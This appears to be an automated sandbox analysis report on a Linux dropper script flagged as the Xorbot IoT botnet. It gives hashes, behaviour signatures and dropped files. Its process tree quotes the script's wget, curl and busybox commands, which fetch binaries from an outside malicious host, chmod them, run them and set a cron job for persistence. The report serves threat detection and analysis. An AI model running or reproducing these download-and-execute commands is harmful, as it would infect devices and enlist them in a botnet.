Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 07:26

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4cfb0882602e49bb3bb56c54e08029a6

  • SHA1

    d60467677204a5e3045c01dca1ff688264ab69b9

  • SHA256

    199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617

  • SHA512

    d9a9c852ca4823533dab2b557a096e4055d3665ce8f562b2d0612029ecba77d391811af06e53e55e4fb483589d1009ab948faf0590252578a3f9a143d5c14aef

  • SSDEEP

    192:0BBSrBsKwWxWlWYW/W3WB9GurAMMsG253Xy5bz2R95PvExdDPvExdrV3X0bz2R9L:0BBSrBsKwWxWlWYW/W3WB6sG285bz2RF

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1655) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 13 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:658
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:660
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:662
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:706
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • System Network Configuration Discovery
        PID:715
      • /bin/chmod
        chmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        ./rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
          PID:738
        • /bin/rm
          rm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
          2⤵
            PID:741
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:742
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:748
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:757
          • /bin/chmod
            chmod 777 bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
            • File and Directory Permissions Modification
            PID:761
          • /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            ./bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
              PID:763
            • /bin/rm
              rm bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
              2⤵
                PID:765
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:766
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                2⤵
                • Checks CPU configuration
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:781
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:783
              • /bin/chmod
                chmod 777 zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                2⤵
                • File and Directory Permissions Modification
                PID:784
              • /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                ./zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                2⤵
                  PID:785
                • /bin/rm
                  rm zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
                  2⤵
                    PID:787
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:788
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    2⤵
                    • Checks CPU configuration
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:789
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:791
                  • /bin/chmod
                    chmod 777 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    2⤵
                    • File and Directory Permissions Modification
                    PID:792
                  • /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    ./6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                    2⤵
                    • Renames itself
                    • Reads runtime system information
                    PID:793
                    • /bin/sh
                      sh -c "crontab -l"
                      3⤵
                        PID:795
                        • /usr/bin/crontab
                          crontab -l
                          4⤵
                          • Reads runtime system information
                          PID:796
                      • /bin/sh
                        sh -c "crontab -"
                        3⤵
                          PID:797
                          • /usr/bin/crontab
                            crontab -
                            4⤵
                            • Creates/modifies Cron job
                            PID:798
                      • /bin/rm
                        rm 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
                        2⤵
                          PID:800
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/gyAnr1XdiI2ATNkxA7xyQOEEXCMZ1sTD2H
                          2⤵
                          • System Network Configuration Discovery
                          • Writes file to tmp directory
                          PID:803

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB

                        Filesize

                        177KB

                        MD5

                        786d75a158fe731feca3880f436082c0

                        SHA1

                        79ea2734e43d00cdeabed5586b2c1994d02aef3e

                        SHA256

                        5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                        SHA512

                        7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                      • /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL

                        Filesize

                        98KB

                        MD5

                        5141342d0df8699fa32a6b066a0c592e

                        SHA1

                        8157673225bd5182f16215e2aa823a25ca2d4fbc

                        SHA256

                        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                        SHA512

                        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                      • /tmp/gyAnr1XdiI2ATNkxA7xyQOEEXCMZ1sTD2H

                        Filesize

                        91KB

                        MD5

                        25ac527124078b14f90d5eb3cb20ea4f

                        SHA1

                        5b0fad64246a62516eb979152faf19ec64d96acb

                        SHA256

                        981dc718aff7dba27785be3b1e91b396c72beea359daa62fcbfd49b3b1e62475

                        SHA512

                        e876c8122c77cd910b9d48a6b427a81ab86800dd8ec5e26bd7874f9a13488c3e69f85dbcacad7b7e2c36a1121b3db2abb373e0dce89c332908915c271e1cbfa1

                      • /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb

                        Filesize

                        99KB

                        MD5

                        9438d9bc392bcf300a5583b6df5bc8f6

                        SHA1

                        375a6ae34b516f6f3eeea8030c4084f585017efa

                        SHA256

                        68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                        SHA512

                        1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                      • /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy

                        Filesize

                        111KB

                        MD5

                        ca897a38f23ec23521ce0b1b83f8422d

                        SHA1

                        b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

                        SHA256

                        043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

                        SHA512

                        10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

                      • /var/spool/cron/crontabs/tmp.CgBvho

                        Filesize

                        210B

                        MD5

                        002d42b369d77799a53579cd845b8a58

                        SHA1

                        dfc4b45334447d238f0735bf0e0d80cf3782f3b8

                        SHA256

                        be6e6cc9f2b302ac6a75a10a7165071eaa8497c32388da925e7b63061210f5c6

                        SHA512

                        b586206bc3a766d3c98e94850ae73153b0d0356ba36eb671092189cbb3b7f0a31f0e72e20b0ab1a20ff522913caa5c2a0bf8877596933164e44f8e5682bb87dc